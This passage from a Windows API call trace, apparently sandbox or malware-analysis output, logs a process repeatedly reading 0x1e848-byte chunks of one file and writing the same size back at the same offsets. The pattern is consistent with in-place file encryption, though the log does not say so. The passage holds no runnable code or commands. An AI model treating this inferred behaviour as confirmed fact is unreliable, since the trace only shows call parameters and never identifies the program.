liDistanceToMove=0x826a3b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.582] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.651] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x826a3b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.652] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.652] GetProcessHeap () returned 0x500000 [0123.652] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.652] GetProcessHeap () returned 0x500000 [0123.652] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.652] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x82a7440, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.652] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.663] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x82a7440, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.664] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.664] GetProcessHeap () returned 0x500000 [0123.664] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.664] GetProcessHeap () returned 0x500000 [0123.664] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.664] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x82e44d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.664] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.684] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x82e44d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.684] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.687] GetProcessHeap () returned 0x500000 [0123.687] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.687] GetProcessHeap () returned 0x500000 [0123.687] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.687] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8321560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.687] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.704] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8321560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.704] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.705] GetProcessHeap () returned 0x500000 [0123.705] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.705] GetProcessHeap () returned 0x500000 [0123.705] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.705] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x835e5f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.705] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.716] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x835e5f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.716] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.717] GetProcessHeap () returned 0x500000 [0123.717] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.717] GetProcessHeap () returned 0x500000 [0123.717] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.717] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x839b680, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.717] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.727] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x839b680, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.727] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.728] GetProcessHeap () returned 0x500000 [0123.728] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.728] GetProcessHeap () returned 0x500000 [0123.728] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.728] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x83d8710, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.728] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.739] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x83d8710, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.739] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.740] GetProcessHeap () returned 0x500000 [0123.740] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.740] GetProcessHeap () returned 0x500000 [0123.740] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.740] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x84157a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.740] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.761] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x84157a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.761] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.761] GetProcessHeap () returned 0x500000 [0123.761] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.761] GetProcessHeap () returned 0x500000 [0123.761] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.762] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8452830, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.762] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.772] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8452830, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.772] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.773] GetProcessHeap () returned 0x500000 [0123.773] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.773] GetProcessHeap () returned 0x500000 [0123.773] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.773] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x848f8c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.773] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.784] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x848f8c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.784] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.784] GetProcessHeap () returned 0x500000 [0123.785] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.785] GetProcessHeap () returned 0x500000 [0123.785] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.785] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x84cc950, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.785] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.804] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x84cc950, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.804] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.805] GetProcessHeap () returned 0x500000 [0123.805] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.805] GetProcessHeap () returned 0x500000 [0123.805] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.805] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x85099e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.805] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.823] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x85099e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.823] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.824] GetProcessHeap () returned 0x500000 [0123.824] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.824] GetProcessHeap () returned 0x500000 [0123.824] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.824] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8546a70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.824] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.836] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8546a70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.836] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.837] GetProcessHeap () returned 0x500000 [0123.837] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.837] GetProcessHeap () returned 0x500000 [0123.837] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.837] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8583b00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.837] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.853] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8583b00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.853] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.854] GetProcessHeap () returned 0x500000 [0123.854] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.854] GetProcessHeap () returned 0x500000 [0123.854] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.854] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x85c0b90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.854] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.891] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x85c0b90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.891] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.892] GetProcessHeap () returned 0x500000 [0123.892] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.892] GetProcessHeap () returned 0x500000 [0123.892] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.892] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x85fdc20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.892] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.910] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x85fdc20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.910] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.912] GetProcessHeap () returned 0x500000 [0123.912] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.912] GetProcessHeap () returned 0x500000 [0123.912] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.912] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x863acb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.912] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.941] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x863acb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.941] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.942] GetProcessHeap () returned 0x500000 [0123.942] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.942] GetProcessHeap () returned 0x500000 [0123.942] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.942] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8677d40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.942] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.958] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8677d40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.958] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.959] GetProcessHeap () returned 0x500000 [0123.959] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.959] GetProcessHeap () returned 0x500000 [0123.959] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.959] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x86b4dd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.959] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.971] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x86b4dd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.971] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.971] GetProcessHeap () returned 0x500000 [0123.971] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.971] GetProcessHeap () returned 0x500000 [0123.971] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.971] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x86f1e60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.972] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.997] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x86f1e60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.997] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.999] GetProcessHeap () returned 0x500000 [0123.999] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.999] GetProcessHeap () returned 0x500000 [0123.999] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.999] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x872eef0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.999] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.011] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x872eef0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.011] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.013] GetProcessHeap () returned 0x500000 [0124.013] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.013] GetProcessHeap () returned 0x500000 [0124.013] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.013] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x876bf80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.013] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.024] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x876bf80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.024] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.025] GetProcessHeap () returned 0x500000 [0124.025] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.025] GetProcessHeap () returned 0x500000 [0124.025] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.025] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x87a9010, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.025] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.037] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x87a9010, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.037] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.038] GetProcessHeap () returned 0x500000 [0124.038] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.038] GetProcessHeap () returned 0x500000 [0124.038] RtlAllocateHeap 